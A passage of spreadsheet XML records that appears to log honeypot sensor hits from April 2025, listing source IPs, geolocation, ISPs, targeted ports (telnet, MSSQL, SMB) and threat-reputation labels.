(103.114.146.142,62479)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,62959)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,64658)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,65025)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6772:928e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1073"/>
    <x v="1073"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T08:43:55"/>
    <d v="2025-04-23T08:40:52"/>
    <d v="2025-04-23T08:43:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL Internet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f6:abac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1074"/>
    <x v="1074"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T08:42:04"/>
    <d v="2025-04-23T08:42:04"/>
    <d v="2025-04-23T08:42:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:769b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1075"/>
    <x v="1075"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T08:30:05"/>
    <d v="2025-04-23T08:21:57"/>
    <d v="2025-04-23T08:30:05"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:dcc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1076"/>
    <x v="1076"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T08:09:29"/>
    <d v="2025-04-23T08:09:29"/>
    <d v="2025-04-23T08:09:29"/>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e:3ce6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1077"/>
    <x v="1077"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:58:34"/>
    <d v="2025-04-23T07:58:34"/>
    <d v="2025-04-23T07:58:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="111"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:c562"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1078"/>
    <x v="1078"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:48:06"/>
    <d v="2025-02-15T16:22:32"/>
    <d v="2025-04-23T07:48:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:a063"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1079"/>
    <x v="1079"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:47:00"/>
    <d v="2025-04-23T07:47:00"/>
    <d v="2025-04-23T07:47:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:b92c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1080"/>
    <x v="1080"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:30:02"/>
    <d v="2025-02-24T11:50:26"/>
    <d v="2025-04-23T07:30:02"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="YO"/>
    <s v="Yogyakarta"/>
    <s v="Kota Yogyakarta"/>
    <s v="Yogyakarta"/>
    <s v="1621177"/>
    <s v="NA"/>
    <s v="-7.8109"/>
    <s v="110.349"/>
    <s v="55666"/>
    <s v="PT Media Sarana Data"/>
    <s v="PT Media Sarana Data"/>
    <s v="business"/>
    <s v="Gmedia ID Semarang"/>
    <s v="2009-01-02"/>
    <s v="GMEDIA-ID-SEMARANG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:704e:256e"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1081"/>
    <x v="1081"/>
    <s v="NA&amp;&amp;220-132-39-221.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-23T07:28:19"/>
    <d v="2023-11-17T04:01:26"/>
    <d v="2025-04-23T07:28:19"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;29387&amp;&amp;23"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:27dd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1082"/>
    <x v="1082"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:23:02"/>
    <d v="2025-04-23T07:23:02"/>
    <d v="2025-04-23T07:23:02"/>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3b5d:8944"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1083"/>
    <x v="1083"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:21:15"/>
    <d v="2025-04-23T07:21:15"/>
    <d v="2025-04-23T07:21:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PY"/>
    <s v="Puducherry"/>
    <s v="Karaikal"/>
    <s v="Karaikal"/>
    <s v="1267887"/>
    <s v="NA"/>
    <s v="10.9167"/>
    <s v="79.8333"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5c9b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1084"/>
    <x v="1084"/>
    <s v="NA&amp;&amp;host-79-16-20-13.retail.telecomitalia.it"/>
    <x v="0"/>
    <d v="2025-04-23T07:11:04"/>
    <d v="2025-04-03T02:58:35"/>
    <d v="2025-04-23T07:11:04"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="34"/>
    <s v="Veneto"/>
    <s v="Venice"/>
    <s v="Fornase"/>
    <s v="8948986"/>
    <s v="NA"/>
    <s v="45.4759"/>
    <s v="12.1627"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f10:140d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1085"/>
    <x v="1085"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T07:03:54"/>
    <d v="2023-12-02T07:29:00"/>
    <d v="2025-04-23T07:03:54"/>
    <n v="369"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;34829&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Kabupaten Pemalang"/>
    <s v="Pemalang"/>
    <s v="1631648"/>
    <s v="NA"/>
    <s v="-6.8935200000000005"/>
    <s v="109.38"/>
    <s v="149974"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Pemalang"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Pemalang"/>
    <s v="business"/>
    <s v="Dinas Komunikasi dan Informatika Kabupaten Pemalang"/>
    <s v="2022-08-10"/>
    <s v="IDNIC-DISKOMINFOKABPEMALANG-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52527)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,63970)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,51708)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52429)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,63506)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64016)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,52367)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64682)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64685)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,64696)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,53458)}&amp;&amp;{Data_SMB:Incoming connection (103.18.188.9,53900)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6712:bc09"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1086"/>
    <x v="1086"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:59:12"/>
    <d v="2024-07-17T09:52:12"/>
    <d v="2025-04-23T06:59:12"/>
    <n v="107"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AZ"/>
    <s v="Azerbaijan"/>
    <s v="BA"/>
    <s v="Baki"/>
    <s v="Baku"/>
    <s v="Baku"/>
    <s v="587084"/>
    <s v="NA"/>
    <s v="40.4093"/>
    <s v="49.8671"/>
    <s v="8814"/>
    <s v="Aztelekom LLC"/>
    <s v="Aztelekom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-11-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50460)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,31279)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,50852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,51216)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49324)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,60050)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55102)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55456)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,65316)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55152)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,55795)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,61671)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53149)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53454)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49168)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,49177)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,62366)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,62374)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,59807)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,59813)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,NULL)}&amp;&amp;{Data_SMB:Incoming connection (80.69.61.40,53711)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5045:3d28"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1087"/>
    <x v="1087"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:56:48"/>
    <d v="2025-04-23T06:56:48"/>
    <d v="2025-04-23T06:56:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kota Surabaya"/>
    <s v="Gubengairlangga"/>
    <s v="1985528"/>
    <s v="NA"/>
    <s v="-7.28145"/>
    <s v="112.744"/>
    <s v="63491"/>
    <s v="IDNIC-WIMA-AS-ID"/>
    <s v="Universitas Katolik Widya Mandala"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca2e:1b25"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1088"/>
    <x v="1088"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T06:42:56"/>
    <d v="2025-04-23T06:42:56"/>
    <d v="2025-04-23T06:42:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
